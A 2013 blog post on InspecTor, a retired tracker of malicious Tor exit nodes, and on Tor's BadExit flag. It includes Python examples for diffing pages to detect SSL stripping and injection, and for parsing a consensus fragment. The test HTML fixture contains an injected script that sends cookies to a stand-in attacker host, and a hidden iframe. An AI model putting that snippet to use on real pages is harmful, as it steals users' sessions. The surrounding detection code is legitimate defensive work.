antiTree | posts and projects
posted on Mar 30, 2013

InspecTor was a .onion page that kept track of bad exit nodes on the Tor network, and it did a pretty good job. It looked for things like:

  • SSL Stripping: Replacing HTTPS links with HTTP
  • JavaScript injection
  • iFrame injection
  • Exit nodes that have no exit policy (black holes)

Those are the easy-to-quantify bad properties: fetch the same content through a suspect Exit Node and through a known-good one and diff the results. These are some of the grey areas it also tried to look for:

  • Warning about similar nodes in the same netblock
  • Watch for similar named nodes spinning up hundreds of instances
  • Look at the names of the nodes and conclude that they’re bad (e.g. NSAFortMeade)
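The diff approach from the first list, written out as an added example (this is not InspecTor's code, which was never published, and it does not fetch anything over Tor). It takes two copies of the same page, one from a trusted baseline fetch and one fetched through the exit under test, and reports the three easy-to-quantify tamperings: an https link rewritten to http, a script the baseline never served, and an iframe the baseline never served. Both HTML samples are constructed for the example.

```python
from html.parser import HTMLParser

# Constructed samples (not real captures): the same login page as returned
# through a clean exit (the baseline) and through a tampering exit.
BASELINE_HTML = """<html><head><title>Login</title>
<script src="https://cdn.example.com/app.js"></script></head>
<body><a href="https://bank.example.com/login">Log in</a>
<a href="http://example.com/help">Help</a></body></html>"""

TAMPERED_HTML = """<html><head><title>Login</title>
<script src="https://cdn.example.com/app.js"></script>
<script>document.write('<img src="http://evil.example/c?' + document.cookie + '">')</script></head>
<body><a href="http://bank.example.com/login">Log in</a>
<a href="http://example.com/help">Help</a>
<iframe src="http://evil.example/frame" width="0" height="0"></iframe></body></html>"""


class PageFeatures(HTMLParser):
    """Collect the three things an exit can tamper with: link targets,
    scripts (external src or inline body) and iframe sources."""

    def __init__(self):
        super().__init__()
        self.links, self.scripts, self.iframes = [], [], []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            self.links.append(a["href"])
        elif tag == "script":
            if a.get("src"):
                self.scripts.append("src:" + a["src"])
            else:
                self._in_script, self._buf = True, []
        elif tag == "iframe" and a.get("src"):
            self.iframes.append(a["src"])

    def handle_data(self, data):
        # HTMLParser hands script bodies over as raw data (CDATA mode)
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.scripts.append("inline:" + "".join(self._buf).strip())


def features(html):
    p = PageFeatures()
    p.feed(html)
    p.close()
    return p


def diff_exit(baseline_html, exit_html):
    """Return (kind, detail) findings for each tampering the exit copy shows."""
    base, ex = features(baseline_html), features(exit_html)
    findings = []
    # SSL stripping: an https link in the baseline that the exit rewrote to http
    for href in base.links:
        if href.startswith("https://"):
            stripped = "http://" + href[len("https://"):]
            if href not in ex.links and stripped in ex.links:
                findings.append(("ssl-strip", href))
    # Anything the exit added that the baseline never served
    for s in ex.scripts:
        if s not in base.scripts:
            findings.append(("js-injection", s))
    for f in ex.iframes:
        if f not in base.iframes:
            findings.append(("iframe-injection", f))
    return findings


if __name__ == "__main__":
    for kind, detail in diff_exit(BASELINE_HTML, TAMPERED_HTML):
        print(f"{kind}: {detail}")
```

The comparison is deliberately exact-match on the baseline: a legitimately dynamic page (rotating ad scripts, per-request nonces) will produce false positives, which is why a real scanner fetches a static control page it owns rather than an arbitrary site.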

The worst-case scenario for a service like this is, first, that it is wrong and kicks a perfectly good Exit Node off its list, and second, that it pushes users into custom routes to evade the "bad" nodes. Doing that gives your network traffic a fingerprint: "he's the guy that never uses Iranian exits", for example.

And that’s kind of what happened with InspecTor, now celebrating the anniversary of its retirement a year ago. Its operator went Judge Dredd on Tor and started drawing broad conclusions about which nodes were evil. For example, he said that NSAFortMeade is obviously an Exit Node owned by the NSA, presumably to catch the traffic of Americans (because they can’t do that already?). Other conclusions stated that a family of Tor nodes was from Washington DC; one of them was malicious, so the conclusion was that it was probably the Government keeping an eye on us.

Tor’s Controls

What control mechanism does Tor have if it does somehow come across a bad exit node? The protocol has a “BadExit” flag so that the directory authorities can let Tor users know that this Exit Node should be avoided. That flag is voted on by the directory authorities (run by Tor Project people, as far as I know), and you have to be blatantly offensive to cause this to happen. Here is the _total_ list of nodes that are flagged today:

  Name      Host [IP]                              Flags / notes
  agitator  agitator.towiski.de [188.40.77.107]    Directory Server, Guard Server
  Unnamed   vz14796.eurodir.ru [46.30.42.154]      Exit Server, Guard Server
  Unnamed   vz14794.eurodir.ru [46.30.42.152]      Exit Server, Tor 0.2.3.25 on Linux
  Unnamed   vz14795.eurodir.ru [46.30.42.153]      Exit Server, Guard Server

http://torstatus.blutmagie.de/index.php?SR=FBadExit&SO=Desc

This says that there are four bad nodes on the network right now (one of them is a directory server, not an exit). I think most people would agree that is a bit low. You can take a look at this link for a complete list of the nodes they’ve flagged in the past. Notice that a BadExit flag doesn’t kick a relay off the network; it just tells the client never to use it as an exit. A flagged relay can stay online as long as it wants and still carry traffic as a guard or middle hop (three of the four above carry the Guard flag), it will just never be picked as the exit.
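To make the BadExit semantics from the last two paragraphs concrete, here is an added example (not Tor's code and not torstatus's) that parses router-status entries in the consensus format Tor clients actually download, lists the relays carrying BadExit, and works out which circuit positions a client would still use them in. The consensus fragment is constructed: the nicknames and addresses follow the torstatus table above, the identity and digest fields are placeholders rather than real keys, and "goodexit" is an invented control relay. The role rules are a simplification of the client's path selection, not a copy of it.

```python
# Constructed fragment in the network-status consensus format (r / s / w / p
# lines per relay). Identity and digest fields are placeholders, not real
# keys; "goodexit" at 203.0.113.7 is an invented control relay.
CONSENSUS = """\
r agitator AAAAAAAAAAAAAAAAAAAAAAAAAAA BBBBBBBBBBBBBBBBBBBBBBBBBBB 2013-03-30 10:00:00 188.40.77.107 443 80
s BadExit Fast Guard HSDir Running Stable V2Dir Valid
w Bandwidth=2000
p reject 1-65535
r Unnamed CCCCCCCCCCCCCCCCCCCCCCCCCCC DDDDDDDDDDDDDDDDDDDDDDDDDDD 2013-03-30 10:00:00 46.30.42.154 443 0
s BadExit Exit Fast Guard Running Stable Valid
w Bandwidth=800
p accept 80,443
r goodexit EEEEEEEEEEEEEEEEEEEEEEEEEEE FFFFFFFFFFFFFFFFFFFFFFFFFFF 2013-03-30 10:00:00 203.0.113.7 9001 9030
s Exit Fast Running Stable Valid
w Bandwidth=1500
p accept 80,443
"""


def parse_consensus(text):
    """Parse router-status entries: an 'r' line opens a relay, and the 's'
    (flags) and 'p' (exit policy summary) lines that follow belong to it."""
    relays, cur = [], None
    for line in text.splitlines():
        parts = line.split()
        if not parts:
            continue
        kw = parts[0]
        # r nickname identity digest date time IP ORPort DirPort
        if kw == "r" and len(parts) >= 9:
            cur = {"nickname": parts[1], "address": parts[6],
                   "orport": int(parts[7]), "flags": set(), "policy": ""}
            relays.append(cur)
        elif cur is None:
            continue
        elif kw == "s":
            cur["flags"] = set(parts[1:])
        elif kw == "p":
            cur["policy"] = " ".join(parts[1:])
    return relays


def bad_exits(relays):
    return [r for r in relays if "BadExit" in r["flags"]]


def client_roles(relay):
    """Positions a client will still place this relay in (simplified rules).
    BadExit only removes the exit role; a flagged relay that carries Guard is
    still a perfectly usable guard, and any Running+Valid relay is a middle."""
    flags = relay["flags"]
    roles = []
    if "Guard" in flags:
        roles.append("guard")
    if "Running" in flags and "Valid" in flags:
        roles.append("middle")
    if "Exit" in flags and "BadExit" not in flags:
        roles.append("exit")
    return roles


if __name__ == "__main__":
    relays = parse_consensus(CONSENSUS)
    for r in bad_exits(relays):
        print(f"{r['nickname']:10} {r['address']:15} still usable as: {client_roles(r)}")
```

Run against the constructed fragment, both flagged relays come back as guard and middle but never exit, which is exactly the "still online, never picked as the exit" outcome described above.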

The Point

The point is not just to say everything sucks, that Tor isn’t doing a good job of monitoring Exit Nodes, or that InspecTor was doing too good a job for its own good. It’s to highlight the real-world problem in Tor. Unlike the sexy theoretical attacks we like to wrap our heads around, like a global adversary correlating your traffic back to an individual IP by statistically analyzing your web history patterns, the most likely thing to happen to you is that some douche nuckle is running dsniff and ulogd on an exit. The point is also to highlight the need for a replacement for Snakes On A Tor. You can tell by its name that it’s a bit outdated. That is something actively being worked on, but it may be a while before something reliable comes out of it.